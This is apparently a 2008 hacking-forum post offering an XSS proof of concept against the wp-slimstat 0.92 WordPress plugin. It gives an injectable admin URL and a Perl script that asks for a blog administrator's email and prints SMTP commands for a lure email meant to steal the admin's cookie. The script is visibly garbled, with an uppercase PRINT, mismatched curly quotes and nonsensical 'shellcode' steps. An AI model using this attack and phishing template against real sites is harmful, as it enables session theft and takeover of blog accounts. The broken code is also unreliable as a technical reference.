22.01.2008, 14:03
|
|
Banned
Регистрация: 04.01.2007
Сообщений: 193
С нами:
10184006
Репутация:
728
|
|
XSS in plugin wp-slimstat 0.92 para Wordpress
PoC directamente:
Код:
http://wordpress-web-blog.com/wp-admin/index.php?page=wp-sl
imstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=[xss]
PoC En Perl:
Код:
# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he’s blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#
#use Net::DNS:Simple;
#use Math;
use Socket;
print "Welcome. What is target email address of wordpress blog admin : \n";
my $target = <stdin>;
print "ok target is $target\n";
sleep(3);
print "ok What is address of wordpress blog : \n";
sleep(5); my $address = <stdin>;
print "ok target is $target\n";
sleep(6);
# print "testing"
print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n";
print "\n\n — CUT OUTPUT HERE — \n\n";
print "HELO xssworm.com\n";
print "RSET\n";
PRINT "MAIL FROM: <xssworm@hotmail.com>\n";
print "RCPT TO: <$target>\n";
print "DATA\n”; print “Free x pciture and movies at $address\n";
print "\r\n.\r\nquit\r\n";
print "\n\n — END OF OUTPUT CUT HERE –\n";
print "";
print "Ok now you neeed to cut the exploit above and paste it to:\n";
print "$address : 25 \n";
print "Shellcode by vaj@xssworm.com c. 2007\n";
print "End of attack.\n";
print "";
#print "Debug mode on"
#print "XSS initialized"
#payload
sleep(1); return(0);
# snips</xssworm@hotmail.com></stdin></stdin>
|
|
|